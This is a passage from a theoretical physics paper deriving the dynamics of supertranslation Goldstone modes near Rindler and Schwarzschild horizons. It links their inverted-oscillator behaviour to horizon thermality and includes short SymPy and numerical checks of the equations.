\pounds_\zeta g_{vv} \approx \mathcal{O}(r); \ \ \ \pounds_\zeta g_{vA} \approx \mathcal{O}(r); \ \ \ \pounds_\zeta g_{AB} \approx \mathcal{O}(r)~.
\label{con1}
\end{eqnarray}
Here, $\pounds_\zeta$ corresponds to the Lie variation for the diffeomorphism $x^a\rightarrow x^a+\zeta^a$. The above conditions are satisfied for the following form of the diffeomorphism vector,
\begin{eqnarray}
\zeta^a \partial_a=&& F(v,y,z) \partial_v -r \partial_v F(v,y,z) \partial_r
\nonumber
\\
&&-r \partial^{A} F(v,y,z) \partial_A~.
\label{BRM1}
\end{eqnarray}
Note that in this case we have only one diffeomorphism parameter $F$, which characterizes the symmetry of the Rindler horizon. Since for constant $F$ it simply generates time translation, the general form of this time diffeomorphism, which acts non-trivially on the $r=0$ hypersurface, is called a {\it supertranslation}. For details of this analysis, we refer to \cite{Maitra:2018saa, Donnay:2015abr, Akhmedov:2017ftb}.
We shall see below that under the diffeomorphism (\ref{BRM1}) some of the metric coefficients transform. This can be thought of as analogous to the transformation (\ref{R1}) which breaks the $U(1)$ symmetry. The corrections to the metric coefficients are determined by the supertranslation parameter $F$. Consequently the macroscopic parameters of the original metric are modified, and therefore, in analogy with $U(1)$ symmetry breaking, this can be regarded as a breaking of the horizon boundary symmetry. Hence one can promote the parameter $F$ to a Goldstone mode. Analogous to the U(1) Goldstone mode, here also we propose that the underlying theory of $F$ is determined by the Einstein-Hilbert action. We shall find the leading order correction to this action due to the aforesaid diffeomorphism which, as for the $U(1)$ symmetry breaking Goldstone, ultimately determines the dynamics of the ``Goldstone mode'' ($F$) in the present context.
In order to study the dynamics, let us first find the modified metric consistent with the aforementioned gauge (\ref{con}) and fall-off (\ref{con1}) conditions. It is important to remember that the Lie variation of the metric components in our analysis is defined up to linear order in $\zeta^a$, and hence we use the form of $\zeta^a$ (\ref{BRM1}) valid up to linear order in $F$. Under the diffeomorphism generated by (\ref{BRM1}), the modified metric takes the following form:
\begin{eqnarray}
ds'^2 \equiv g'_{ab} dx^a dx^b &=& \Big[ g^{(0)}_{ab} + \pounds_\zeta g^{(0)}_{ab} \Big] dx^a dx^b \nonumber\\
&=& -2 r \alpha dv^2 + 2 dv dr + \delta_{AB} dx^A dx^B \nonumber\\
&+& \Big[-2r\Big(\alpha \partial_{v} F + \partial^2_v F\Big)\Big] dv^2 \nonumber\\
&+& \Big[-2r\Big(\alpha \ \partial_{A}F + \partial_{A} \partial_v F\Big)\Big] dv dx^A\nonumber\\
&+&\big[- 2 r \partial_A \partial_B F \Big] dx^A dx^B~.
\label{rindler}
\end{eqnarray}
In the above, $g^{(0)}_{ab}$ is the original unperturbed metric (\ref{BRM2}), whereas all the terms linear in $F$ constitute the perturbation $h_{ab}=\pounds_\zeta g^{(0)}_{ab}$. Under the following supertranslation symmetry transformation,
\begin{equation}
v'= v + F(v,x^A)~,~x'^A = x^A - r\partial^A F(v,x^A) ,
\end{equation}
we can clearly see that the macroscopic state parameter $\alpha$ of the original Rindler background transforms as
\begin{equation}
\alpha \rightarrow \alpha +\Big(\alpha \partial_{v} F + \partial^2_v F\Big)\label{alpha} .
\end{equation}
Therefore, this change of the macroscopic state under the symmetry transformation can be understood as a breaking of the boundary symmetry of the Rindler spacetime \cite{Eling:2016xlx}. As $F$ is the parameter associated with the broken symmetry generator, following the standard procedure of Goldstone mode analysis, we promote $F$ to a Goldstone boson field. However, all measurements will be made with respect to the usual unprimed coordinates, and the dynamics of the mode is defined on the $r=0$ hypersurface.
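The linearised perturbation (\ref{rindler}) and the shift (\ref{alpha}) can be cross-checked symbolically. The following SymPy sketch computes $(\pounds_\zeta g)_{ab}$ for the background (\ref{BRM2}) and the vector (\ref{BRM1}), confirming the $vv$ and transverse components together with the gauge conditions (\ref{con}).

```python
import sympy as sp

v, r, y, z, alpha = sp.symbols('v r y z alpha')
X = (v, r, y, z)
F = sp.Function('F')(v, y, z)

# Background Rindler metric in Gaussian null coordinates, Eq. (BRM2)
g = sp.Matrix([[-2*r*alpha, 1, 0, 0],
               [1,          0, 0, 0],
               [0,          0, 1, 0],
               [0,          0, 0, 1]])

# Supertranslation vector of Eq. (BRM1)
zeta = [F, -r*sp.diff(F, v), -r*sp.diff(F, y), -r*sp.diff(F, z)]

def lie_g(a, b):
    """Component (a, b) of the Lie derivative of g along zeta."""
    expr = sum(zeta[c]*sp.diff(g[a, b], X[c])
               + g[c, b]*sp.diff(zeta[c], X[a])
               + g[a, c]*sp.diff(zeta[c], X[b]) for c in range(4))
    return sp.simplify(expr)

h_vv = lie_g(0, 0)   # expected: -2r (alpha F_v + F_vv)
h_yz = lie_g(2, 3)   # expected: -2r F_yz
```

The same function also returns zero for the $rr$ and $vr$ components, which is exactly the statement of the gauge conditions (\ref{con}) for this $\zeta^a$.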
Since $\alpha$ appears as a Lagrange multiplier in the Hamiltonian formulation, one usually chooses the gauge in which the variation of $\alpha$ vanishes everywhere \cite{Eling:2016xlx,Eling:2016qvx}. However, strictly speaking, this is not a generic choice. For consistency it is sufficient to set the variation of $\alpha$ to zero only at the boundary,
\begin{equation}
\delta \alpha (-\infty,x^A) = \lim_{v\rightarrow-\infty} \Big(\alpha \partial_{v} F + \partial^2_v F\Big) =0, \label{boundary}
\end{equation}
where the horizon is located at $v\rightarrow -\infty$.
One obvious choice satisfying the above condition is to set the total variation $\delta \alpha$ to zero everywhere \cite{Donnay:2016ejv}. This naturally sets the boundary condition at the horizon and, furthermore, makes the field $F$ non-dynamical. We therefore believe this restrictive condition does not capture the full potential of the Goldstone modes. The goal of this paper is to go beyond it and understand the dynamics of these Goldstone modes, which could be potential candidates for the underlying degrees of freedom of the black hole. Therefore,
we first construct an appropriate Lagrangian for this mode and finally, at the level of the solution, set the boundary condition such that Eq. (\ref{boundary}) is automatically satisfied at the horizon. It is important to note that if one allows the fluctuation of $\alpha$ even at the boundary, one needs to take care of the appropriate boundary terms (e.g. see \cite{Bunster:2014mua}\cite{Perez:2016vqo}), which will be discussed in a separate paper.
\subsection{Dynamical equation for $F$}
As we have already pointed out, in order to study the dynamics of $F$ we propose the Lagrangian $\mathcal{L}_{F}$ associated with the perturbed metric (\ref{rindler}) near the $r=0$ surface:
\begin{eqnarray}
\mathcal{L}_{F} = \sqrt{-g'} R' \label{L}~.
\end{eqnarray}
Here $R'$ is the Ricci scalar of the new metric $g'_{ab}$ (\ref{rindler}) and $g'$ is the corresponding determinant. To study the dynamics of the Goldstone mode associated with the horizon symmetry, we first compute the Lagrangian (\ref{L}) at an arbitrary value of $r$ in the bulk spacetime and then take the limit $r\rightarrow 0$. This procedure is similar to the stretched horizon approach in black hole thermodynamics (for example, see the discussion in section $4$ of \cite{Carlip:1999cy}). In that approach, if one is interested in a quantity on a particular surface (say $r=0$), one first calculates it just away from this surface (say at $r=\epsilon$, with $\epsilon$ very small) and then obtains the final value by taking the limit $\epsilon\rightarrow 0$.
Now we are in a position to expand our Lagrangian (\ref{L}) around the background using the transformed metric (\ref{rindler}). If the metric components are $g_{ab}=g_{ab}^{(0)}+h_{ab}$, with $h_{ab}$ a small fluctuation, the Taylor series expansion of the Lagrangian around the background metric $g_{ab}=g_{ab}^{(0)}$ can be written as
\begin{equation}
\mathcal{L_{F}} = \mathcal{L_{F}}(g_{ab}^{(0)}) + h_{ab}\Big(\frac{\delta\mathcal{L_{F}}}{\delta g_{ab}}\Big)^{(0)} + \frac{1}{2}h_{ab}h_{cd}\Big(\frac{\delta^2\mathcal{L_{F}}}{\delta g_{ab} \delta g_{cd}}\Big)^{(0)}+\dots
\label{BRM4}
\end{equation}
The first term of the above expansion obviously does not contribute to the dynamics. Given that the background metric is a solution of the equations of motion, the second term vanishes, as it is proportional to Einstein's equations. The third term yields the quadratic action for the Goldstone field $F$. For the purposes of the present paper, we restrict the Goldstone mode Lagrangian to quadratic order; all higher order terms in $F$ are left for future work.
The final form of the Lagrangian (\ref{L}), after taking the near-horizon limit, comes out as:
\begin{eqnarray}
{\mathcal{L}_{F}} &=& \lim_{r \to 0} \Big(\sqrt{-g'} R'\Big)
\nonumber\\
&=& \Big[-6 \alpha^2 \partial_y F \partial_y F -6 \alpha^2 \partial_z F \partial_z F
+4 \alpha \partial_v F \partial^2_y F \nonumber\\ & -& 12 \alpha \partial_z F \partial_v \partial_z F - 6(\partial_v \partial_z F)^2 - 12 \alpha \partial_y F \partial_v \partial_y F \nonumber\\ &-& 6(\partial_v \partial_y F)^2 + 4 \partial^2_y F \partial^2_v F + 4 \partial^2_z F (\alpha \partial_v F + \partial^2_v F) \Big]~.\nonumber\\
\label{RL}
\end{eqnarray}
Since ${\mathcal{L}_{F}}$ is calculated on an $r=$ constant surface, the action is defined as the integration of the above Lagrangian over $v$, $y$ and $z$. The induced horizon geometry has a flat spatial section; we therefore consider the following generic form of $F$:
\begin{eqnarray}
F_{mn} = f_{mn}(v) \frac{1}{\alpha} \exp\Big[i (my+nz)\Big]~.
\label{F}
\end{eqnarray}
Hence the general solution for Goldstone mode would be,
\begin{eqnarray}
F(v,y,z) = \sum_{m,n} C_{mn} F_{mn}~.
\end{eqnarray}
Here we need to find the form of $f_{mn}(v)$ from the solution of the equation of motion obtained from (\ref{RL}). Substituting the above ansatz and integrating over the transverse coordinates, one obtains a one-dimensional action which determines the evolution of $f_{mn}(v)$ in $v$. Since total derivative terms in the action leave the dynamics unchanged, it may be verified that, under the integration over the transverse coordinates, the third, fourth, sixth and ninth terms are total derivatives with respect to $v$ and can therefore be neglected.
Ignoring the total derivative terms, the final form of the Lagrangian (\ref{RL}) is given by
\begin{eqnarray}
{\mathcal{L}_{F}} &=& \Big[-6 \alpha^2 \partial_y F \partial_y F -6 \alpha^2 \partial_z F \partial_z F- 6(\partial_v \partial_y F)^2 \nonumber\\ &-& 6(\partial_v \partial_z F)^2+ 4 \partial^2_y F \partial^2_v F + 4 \partial^2_z F \partial^2_v F \Big]~. \label{Lfi}
\end{eqnarray}
Before proceeding further, we want to mention an important point about our proposed form of the Goldstone boson Lagrangian. Since the modified metric (\ref{rindler}) has been constructed from a particular diffeomorphism, one might conclude that the Lagrangian must be invariant up to a total derivative. The contribution of a total derivative term vanishes over the closed boundary which encloses the bulk of the manifold. For instance, in the case of $\sqrt{-g}R$, its variation under the diffeomorphism $x^a\rightarrow x^a+\xi^a$ leads to $\sqrt{-g}\nabla_a(R\xi^a)=\partial_a(\sqrt{-g}R\xi^a)$, which is a total derivative term.
In this analysis, however, we are interested in building a theory on the horizon (i.e. $r=0$), and the horizon is only a part of the closed boundary of the bulk manifold. Therefore it is expected that the total derivative term gives a non-vanishing contribution on a part of the closed surface, such as the horizon. In the case of $\sqrt{-g}R$, the
boundary term on an $r=$ constant surface in the variation of the action is given by $\int d^3x\,\hat{n}_a\xi^a \sqrt{-g}R$, where $\hat{n}_a$ is the normal to the surface, with components $(0,1,0,0)$. Therefore, on this surface our proposal for the Lagrangian density (which we loosely call the Lagrangian) is $\sqrt{-g}R$. This is precisely what is considered here. The Lagrangian (\ref{RL}) is not defined on the whole
spacetime; rather, it is calculated on the $r=$ constant surface, and hence comes out non-trivial. In this sense our proposed
Lagrangian does not carry any ambiguity and correctly describes the dynamics of the Goldstone mode $F$ associated with the supertranslation symmetry near the horizon.
Next we turn to the Gibbons-Hawking-York (GHY) boundary term
\begin{equation}
\mathcal{S}_2 =- \frac{1}{8\pi G}\int d^3x \sqrt{h}K~,
\label{GHY}
\end{equation}
which is usually added to the action in order to define a proper variational principle. The trace of the extrinsic curvature of the boundary surface ($r\rightarrow 0$) is given by $K = -\nabla_a N^a$, where $N^a$ is the unit normal to the $r=$ constant hypersurface. For the metric (\ref{rindler}), its lowered components are $ N_a =(0, 1/\sqrt{2r(\alpha +\alpha \partial_v F +\partial^2_{v} F)},0,0) $. Therefore, in the near horizon limit ($r \rightarrow 0$), the contribution of the GHY term to the action takes the form:
\begin{eqnarray}
&&\mathcal{S}_2= -\frac{1}{8 \pi G}\int d^3 x\Big[\alpha +\Big(\alpha \partial_v F + \frac{1}{2}\partial^2_v F + \frac{1}{2 \alpha} \partial^3_v F\Big)
\nonumber\\
&&+ \frac{1}{2 \alpha
^2}\Big(\alpha^2 \partial_v F \partial^2_v F + \alpha (\partial^2_v F)^2 + \alpha \partial_v F \partial^3_v F
\nonumber
\\
&&+ \partial^2_v F \partial^3_v F \Big)\Big]~.
\label{Kac}
\end{eqnarray}
However, we observe that this term does not contribute to the required equation of motion.
In fact, the above boundary term in the action turns out to be related to the horizon entropy, as discussed in appendix (\ref{App2}).
Note that the aforesaid Lagrangian (\ref{RL}) contains higher derivative terms in $F$. Therefore, the theory of the Goldstone boson modes emerging on the boundary of a gravitational theory turns out to be higher derivative in nature. The origin of these higher derivative terms can be traced back to the diffeomorphically transformed metric components, which already contain derivatives of $F$. These higher derivative terms will be crucial for our subsequent discussion of the horizon properties, and this connection could be an interesting topic for further investigation. Another important point is that at the background level the system is not Lorentz invariant. The generalized Euler-Lagrange equation for a higher derivative theory is:
\begin{eqnarray}
\frac{\partial L}{\partial F} - \partial_{\mu}(\frac{\partial L}{\partial (\partial_{\mu} F)}) + \partial_{\mu} \partial_{\nu} (\frac{\partial L}{\partial (\partial_{\mu} \partial_{\nu} F)}) =0 .\label{GenEH}
\end{eqnarray}
With this the equation of motion is found to be
\begin{eqnarray}
3 \alpha^2 \partial^2_y F +3 \alpha^2 \partial^2_z F -4 \partial^2_y \partial^2_v F -4 \partial^2_z \partial^2_v F =0~.
\label{BRM5}
\end{eqnarray}
It is important to note again that the contribution to the equation of motion comes only from (\ref{Lfi}); the GHY term (\ref{Kac}) does not contribute.
Substitution of (\ref{F}) in (\ref{BRM5}) yields
\begin{eqnarray} \label{modeeq1}
(m^2 +n^2) [\partial^2_{v}f_{mn}(v) -\frac{3 \alpha^2}{4} f_{mn}(v)]= 0~.
\end{eqnarray}
It is important to note that every individual mode $(m,n)$ follows the same equation of motion, namely that of a simple oscillator in an inverted harmonic potential. The solution is
\begin{eqnarray}
f_{mn}(v) && = A \exp\Big[(\sqrt{3/4}) \alpha v\Big] + B \exp\Big[-(\sqrt{3/4}) \alpha v \Big] \nonumber\\ &+ & f_1 (y,z) \delta_{m,0} \delta_{n,0}\label{Gsol}~,
\end{eqnarray}
for all $m,n$.
In the above, $A$ and $B$ are arbitrary constants to be determined. So far we have discussed the classical dynamics of the Goldstone mode. It is apparent, at least at the level of the tree-level Lagrangian, that the system is unstable because of the inverted harmonic potential. This is also apparent from the solution (\ref{Gsol}): as we are interested in the near horizon region where $v\rightarrow -\infty$, the second branch of the above solution grows rapidly and makes the mode unstable. Therefore, the appropriate boundary condition one can set is $B=0$, leading to
\begin{eqnarray}
F_{mn} (v,y,z) &&= [A \exp[(\sqrt{3}/2) \alpha v] \nonumber\\ &+& f_1 (y,z) \delta_{m,0} \delta_{n,0} ] \ \frac{1}{\alpha }\exp [i (my+nz)]~.\nonumber\\ \label{gsol2}
\end{eqnarray}
Interestingly, this is precisely the boundary condition which ensures vanishing fluctuation of the surface gravity, $\delta \alpha=0$, at the horizon defined by Eq. (\ref{boundary}).
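As a simple numerical sanity check (the value of $\alpha$ below is purely illustrative), one can confirm that both exponential branches in (\ref{Gsol}) satisfy the inverted-oscillator equation $\partial^2_v f = (3\alpha^2/4) f$ following from (\ref{modeeq1}):

```python
import math

alpha = 1.3                 # illustrative value of the acceleration parameter
omega2 = 3 * alpha**2 / 4   # coefficient in the mode equation (modeeq1)

def f(v, A=1.0, B=0.5):
    # general solution (Gsol): growing and decaying exponential branches
    s = math.sqrt(3) / 2 * alpha
    return A * math.exp(s * v) + B * math.exp(-s * v)

def second_derivative(g, v, h=1e-4):
    # central finite difference
    return (g(v + h) - 2 * g(v) + g(v - h)) / h**2

# the residual of the mode equation vanishes to numerical accuracy
for v in (-2.0, 0.0, 1.5):
    assert abs(second_derivative(f, v) - omega2 * f(v)) < 1e-5 * abs(f(v))
```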
We already know that the horizon is a special place in the entire spacetime region, as two hypothetical observers spatially separated by the horizon can never communicate with each other. Therefore, it would have been unusual had there been just a simple, stable, free-field-like Lagrangian for the Goldstone modes. The connection between this special nature of the horizon and the emergence of instability has been a subject of study for a long time, and one goal of this paper is to shed some light on this issue. {\em Does the emergence of the inverted harmonic potential have anything to do with the thermal nature of the black hole horizon?} Of course, in order to understand this, we need to go beyond the classical regime. In the next section we will try to make this connection considering a recent proposal \cite{Morita:2018sen,Morita:2019bfr}.
\subsection{Thermal behaviour of the field solution} \label{thermal}
In this section we consider the quantum mechanical treatment of the Goldstone boson mode discussed so far.
It has recently been conjectured that the Lyapunov exponent $\lambda$ of a thermal quantum system, in the presence of quantum chaos, is bounded by the temperature $T$ of the system as $\lambda \leq 2\pi T/\hbar$ \cite{Maldacena:2015waa}. Based on this result, a further conjecture has been made in Refs. \cite{Morita:2019bfr,Kurchan:2016nju}, which says, by reversing the above inequality, that a chaotic system with a definite Lyapunov exponent could be fundamentally thermal. To justify the argument, one of the interesting examples the authors have studied is the semi-classical dynamics of a particle in an inverted harmonic potential{\footnote{The choice of the inverted harmonic oscillator stems from the fact that the particle motion is unstable under this potential and hence, at the classical level, any small perturbation can induce chaos in the motion (for example, see \cite{Bombelli:1991eg}).}}, where it was shown that the quantum correction induces an energy emission by the particle obeying a thermal probability distribution.
In this way, a connection between a semi-classical chaotic system and thermal behaviour emerges.
Interestingly, for our present system, each individual Goldstone boson mode behaves like an inverted harmonic oscillator. Hence, the aforesaid connection between thermal emission and semi-classical chaotic dynamics could be a potential reason for the thermal nature of the black hole horizon. Even more interestingly, every individual Goldstone boson mode parametrized by $(m,n)$ sees the same inverted potential, which may also indicate the universality of the thermal nature of the horizon.
{\em Our present claim is ambitious and exciting, and it needs detailed future exploration}.
Before we return to our discussion of the thermal nature of the black hole, let us briefly describe the connection between thermality and the inverted harmonic oscillator, following Refs. \cite{Morita:2018sen,Morita:2019bfr}.
These are connected through the finite quantum mechanical transition probability across a potential barrier. The equation of motion of a particle moving in an inverted harmonic potential is given by
\begin{eqnarray}
\mu \ddot{x} -\omega x =0 \label{1dParticle}
\end{eqnarray}
Here the potential is $V= -\frac{\omega x^2}{2}$, and $\mu$ is the mass of the particle. The important case is the one in which the energy of the particle is $E < 0$,
for which the potential energy of the particle is greater than its kinetic energy. With this energy, if the particle travels towards the potential barrier from the left ($x<0$), classically it cannot pass through towards the right ($x >0$). However, quantum mechanically the particle has a finite tunneling probability to go across the potential barrier. Therefore, the particle has a finite probability of transmission through the barrier even for $E<0$. In a similar manner, for $E>0$ the particle has a finite quantum mechanical probability of reflection off the barrier, which otherwise would not be possible classically.
Therefore, to describe the above quantum mechanical phenomena the appropriate Hamiltonian for the wave function $\Phi(x)$ associated with the particle is expressed as
\begin{eqnarray}
H = -\frac{{\hbar}^2}{2}\frac{d^2}{d x^2} - \frac{{\omega} x^2}{2}
\end{eqnarray}
with the Schr\"{o}dinger equation,
\begin{eqnarray}
-\frac{{\hbar}^2}{2}\frac{d^2 \Phi}{d x^2} - \frac{{\omega} x^2}{2} \Phi =E \Phi~.
\end{eqnarray}
$E$ is the energy of the particle. The well known expressions for the probabilities of transmission ($P_T$) and reflection ($P_R$), obtained using the WKB approximation (see \cite{Barton:1984ey} for details), are given by
\begin{eqnarray}
P_{T/R} = \frac{1}{e^{\frac{2 \pi}{\hbar} \sqrt{\frac{\mu}{ \omega}} |E|} +1} = \frac{1}{ e^{\beta |E|} +1}~.
\label{trans}
\end{eqnarray}
An interesting interpretation of this expression is that, for a large absolute value of the energy $E$, the probability amplitude for a classical path to undergo quantum transmission or reflection is $\exp[-\beta |E|]$.
Therefore, the inverted harmonic oscillator system can be mapped to a
two level system at temperature $T$, whose ground state is represented by the classical trajectories and whose excited state is the quantum one. The temperature of the system can then be easily identified as
\begin{eqnarray}
T = \frac{\hbar}{2 \pi} \sqrt{\frac{\omega}{\mu}} ~.
\label{R2}
\end{eqnarray}
For further details of this interesting interpretation the reader can look into Refs. \cite{Morita:2018sen,Morita:2019bfr}. In this context it is worth mentioning that recently one of the authors of this paper also showed, in an independent and completely different way, that the inverted harmonic oscillator gives rise to a temperature at the quantum level \cite{Dalui:2019esx}.
In our present analysis we have obtained the dynamical equation of motion for an individual mode, given in (\ref{modeeq1}). Comparing this with Eq. (\ref{1dParticle}), one can easily conclude that the dynamics of the mode along $v$ is governed by an inverted harmonic oscillator potential. To clarify the analogy, each mode $f_{mn}(v)$ can be thought of as the position $x(t)$ of a particle of unit mass, with $v$ playing the role of the time coordinate $t$. Therefore, we have the following equivalence table:
\begin{eqnarray}
f_{mn} \equiv x; \,\,\,\,\ v \equiv t;
\end{eqnarray}
accompanied by the identifications
\begin{equation}
\mu \equiv 1;\,\,\,\,\
\omega \equiv \frac{3 \alpha^2}{4}~.
\end{equation}
Hence by the earlier argument, we can conclude that each mode, at the quantum level, is thermal. The temperature is evaluated as (\ref{R2}) with the following substitutions: $\mu=1$ and $\omega=(3\alpha^2/4)$. Therefore in our case it is given by
\begin{eqnarray}
T = \frac{\hbar}{2 \pi} \frac{\sqrt{3}\alpha}{2} ~.
\end{eqnarray}
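As a consistency check (the numerical value of $\alpha$ is purely illustrative), the short snippet below verifies that the substitutions $\mu=1$, $\omega=3\alpha^2/4$ in (\ref{R2}) reproduce this temperature, and that the distribution (\ref{trans}) reduces to a Boltzmann weight for $|E|\gg T$:

```python
import math

hbar, alpha = 1.0, 1.3             # illustrative units/values
mu, omega = 1.0, 3 * alpha**2 / 4  # Goldstone-mode identifications

# temperature from Eq. (R2); it reproduces T = sqrt(3) hbar alpha / (4 pi)
T = (hbar / (2 * math.pi)) * math.sqrt(omega / mu)
assert abs(T - math.sqrt(3) * hbar * alpha / (4 * math.pi)) < 1e-12

def P(E):
    # transmission/reflection probability of Eq. (trans)
    return 1.0 / (math.exp(abs(E) / T) + 1.0)

# the Fermi-like form tends to the Boltzmann weight exp(-|E|/T) for |E| >> T
E = 10 * T
assert abs(P(E) / math.exp(-E / T) - 1.0) < 1e-4
```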
Even more interestingly, what emerges from our present calculation is that all the modes with quantum numbers $(m,n)$ are degenerate with respect to $E$. {\em This observation seems to suggest that the horizon under study can carry entropy because of those degenerate quantum states}. However, in order to have a finite entropy, we need an upper limit on the values of $(m,n)$, which must be set by the only scale available in the theory, namely the Planck scale.
Our naive analysis based on \cite{Morita:2018sen} shows that semi-classical Goldstone boson dynamics can capture the well known thermal behaviour of the horizon. {\em Moreover, the temperature turns out to be proportional to the acceleration of the Rindler frame}. This is an important observation, as we know that the Rindler horizon is thermal with respect to its own frame, with a temperature proportional to $\alpha$, known as the {\it Unruh temperature} \cite{Unruh:1976db}.
However, the proportionality constant here appears to be different.
{\em Another important outcome of our analysis is the emergence of an infinite number of degenerate states, which can be associated with the entropy of this horizon}. We will take up this issue in a future publication. The microscopic origin of horizon thermodynamics has been a subject of intensive research for a long time. Our present analysis hints at the possibility that the BMS-like symmetry near the horizon could play an important role in understanding the thermal nature and the possible origin of the underlying microscopic states of a black hole. Motivated by this, in the subsequent section we discuss the Schwarzschild black hole.
\section{Schwarzschild black hole}
So far we have discussed the dynamics of the Goldstone boson mode in the Rindler background. We now perform a similar analysis for the Schwarzschild black hole background.
The near horizon geometry of the Schwarzschild black hole is again Rindler, however with a two dimensional sphere at each point. Therefore, we expect similar behavior of the Goldstone mode in this case as well. As we go along, we also point out the main differences with the flat Rindler case.
The Schwarzschild metric in Eddington-Finkelstein coordinates ($v,r,\theta,\phi$) is expressed as
\begin{equation}
ds^2 = -(1- 2M/r) dv^2 + 2 dv dr + r^2 \gamma_{AB} dx^A dx^B~.
\label{metric}
\end{equation}
The event horizon is located at $r=2 M$, where $M$ is the mass of the black hole, which characterizes the macroscopic state of the background spacetime. The asymptotic symmetry properties of the horizon can be extracted from fall-off and gauge conditions for the metric components similar to the previous ones,
\begin{eqnarray}
\pounds_\zeta g_{rr}= 0, \ \ \ \pounds_\zeta g_{vr}=0, \ \ \ \pounds_\zeta g_{Ar}=0~;\label{con2}\\
\pounds_\zeta g_{vv} \approx \mathcal{O}(r); \ \ \ \pounds_\zeta g_{vA} \approx \mathcal{O}(r); \ \ \ \pounds_\zeta g_{AB} \approx \mathcal{O}(r)~.
\label{con3}
\end{eqnarray}
Here, $\pounds_\zeta$ corresponds to the Lie variation for the diffeomorphism $x^a\rightarrow x^a+\zeta^a$.
The primary motivation to consider the aforementioned conditions is essentially to preserve the form of the metric under the diffeomorphism. As has already been observed in our previous case, those diffeomorphisms in turn renormalize the black hole state parameters, such as the mass $M$ of the Schwarzschild black hole. As in our previous analysis, after solving the above gauge fixing conditions together with the imposed fall-off conditions, the diffeomorphism vector turns out to be
\begin{eqnarray}
\zeta^a \partial_a= F(v,x^A) \partial_v -(r-2M) \partial_v F \partial_r \nonumber\\ + (1/r -1/2M) \gamma^{AB} \partial_{B} F \ \partial_A .
\end{eqnarray}
Again we have one unknown function $F$, which is identified as the supertranslation generator. Under this transformation the background metric takes the following form \cite{Averin:2016ybl},
\begin{eqnarray}
g'_{ab} &=& \Big [g^{(0)}_{ab} + \pounds_\zeta g^0_{ab} \Big] dx^a dx^b\nonumber\\
&=& -(1- 2M/r) dv^2 + 2 dv dr + r^2 \gamma_{AB} dx^A dx^B \nonumber\\
&+& \Big[2M/r(1- 2M/r) \partial_v F - 2 (1- 2M/r)\partial_v F \nonumber\\&& -2 (r-2M) \partial^2_v F \Big] dv^2 + \Big[-(1-2M/r) \partial_{A} F \nonumber\\ &&-(r-2M) \partial_{A}\partial_v F + r^2 \partial_{A}\partial_v F (1/r - 1/2M) \Big] dv dx^A \nonumber\\ &+& \Big [-2 (2M-r)r \gamma_{AB} \partial_v F\nonumber\\ &-& (1/r -1/2M)(\partial_E F \gamma^{DE} \partial_D \gamma_{AB}\nonumber\\ &+& \gamma_{AD} \ \partial_B (\partial_E F \gamma^{DE})) \Big] dx^A dx^B~.
\label{SS}
\end{eqnarray}
As has already been discussed for the Rindler metric with flat spatial section, in the present case, under the modification $h_{ab}$ due to the following super-translation,
\begin{equation}
v'= v + F~;~x'^A = x^A + (1/r -1/2M) \gamma^{AB} \partial_{B} F ,
\end{equation}
the macroscopic black hole state parameter $M$ renormalizes to,
\begin{equation}
\frac{1}{M} \rightarrow \frac{1}{M} +\frac{1}{M}\Big(\partial_{v} F + 4 M \partial^2_v F\Big) .
\end{equation}
Therefore, this change of the macroscopic state under the symmetry transformation can similarly be understood as a breaking of the boundary super-translation symmetry, with $F$ as the broken symmetry generator.
Following the same procedure as for the Rindler case, the Lagrangian $\mathcal{L}_{F}$ of the Goldstone mode on the horizon surface takes the following form,
\begin{eqnarray}
\mathcal{L_{F}}&=& \Big[ \frac{-3}{2 (2M)^2} \csc\theta \ \partial_{\phi} F \partial_{\phi} F - \frac{3}{2 (2M)^2} \sin\theta \ \partial_{\theta} F \partial_{\theta} F \nonumber\\ &+& 4 \sin\theta \ \partial_{v} F \partial_{v} F - \frac{3}{M} \csc\theta \ \partial_{\phi} F \partial_{v} \partial_{\phi} F \nonumber\\ &+& \frac{1}{M} \cos\theta \ \partial_{\theta} F \partial_{v} F -\frac{3}{M} \sin\theta \ \partial_{\theta} F \partial_{\theta} \partial_{v} F \nonumber\\ &+& 4 \cos\theta \ \partial_{\theta} F \partial^2_{v} F + \frac{1}{M} \csc \theta \ \partial^2_{\phi} F \partial_v F\nonumber\\ & +& 4 \csc\theta \ \partial^2_{\phi} F \partial^2_{v} F + \frac{1}{M} \sin\theta \ \partial^2_{\theta} F \partial_v F\nonumber\\ & +& 4 \sin\theta \ \partial^2_{\theta} F \partial^2_{v} F - 6 \csc\theta \ (\partial_v \partial_{\phi} F)^2 \nonumber\\ &-& 6 \sin\theta \ (\partial_v \partial_{\theta} F)^2 + 8 \sin\theta \ \partial_v F \partial^2_v F \Big]~.
\label{LagS}
\end{eqnarray}
Neglecting total derivative terms, we can write the final Lagrangian as
\begin{eqnarray}
\mathcal{L_{F}}&=& \Big[ \frac{-3}{2 (2M)^2} \csc\theta \ \partial_{\phi} F \partial_{\phi} F - \frac{3}{2 (2M)^2} \sin\theta \ \partial_{\theta} F \partial_{\theta} F \nonumber\\ &+& 4 \sin\theta \ \partial_{v} F \partial_{v} F + 4 \cos\theta \ \partial_{\theta} F \partial^2_{v} F \nonumber\\ &+& 4 \csc\theta \ \partial^2_{\phi} F \partial^2_{v} F + 4 \sin\theta \ \partial^2_{\theta} F \partial^2_{v} F\nonumber\\ &-& 6 \csc\theta \ (\partial_v \partial_{\phi} F)^2 - 6 \sin\theta \ (\partial_v \partial_{\theta} F)^2 \Big]~.\label{lags1}
\end{eqnarray}
Here the non-vanishing lower component of $N^a$ is given by
\begin{eqnarray}
N_r = \frac{1}{\sqrt{f(r)- (2M/r)f(r) \partial_v F +
2 f(r)\partial_v F +2rf(r) \partial^2_v F}}~,
\end{eqnarray}
where $f(r)=1-2M/r$.
Hence the GHY boundary term in the action can be expressed as
\begin{eqnarray}
\mathcal{S}_2 &=& - \frac{M}{8 \pi G}\int d^3 x \sin\theta \Big[1 + (\partial_v F + 2M \partial^2_v F)\nonumber\\ &+& (2M \partial_v F \partial^2_v F + 8 M^2 (\partial^2_v F)^2 + 8 M^2 \partial_v F \partial^3_v F\nonumber\\ &+& 32 M^3 \partial^2_v F \partial^3_v F) \Big ]~,
\label{K}
\end{eqnarray}
which again does not contribute to the equation of motion, as was the case for Rindler space.
The dynamics of the Goldstone mode will be governed by the action corresponding to $\mathcal{L_{F}}$, and the equation of motion is given by,
\begin{eqnarray}
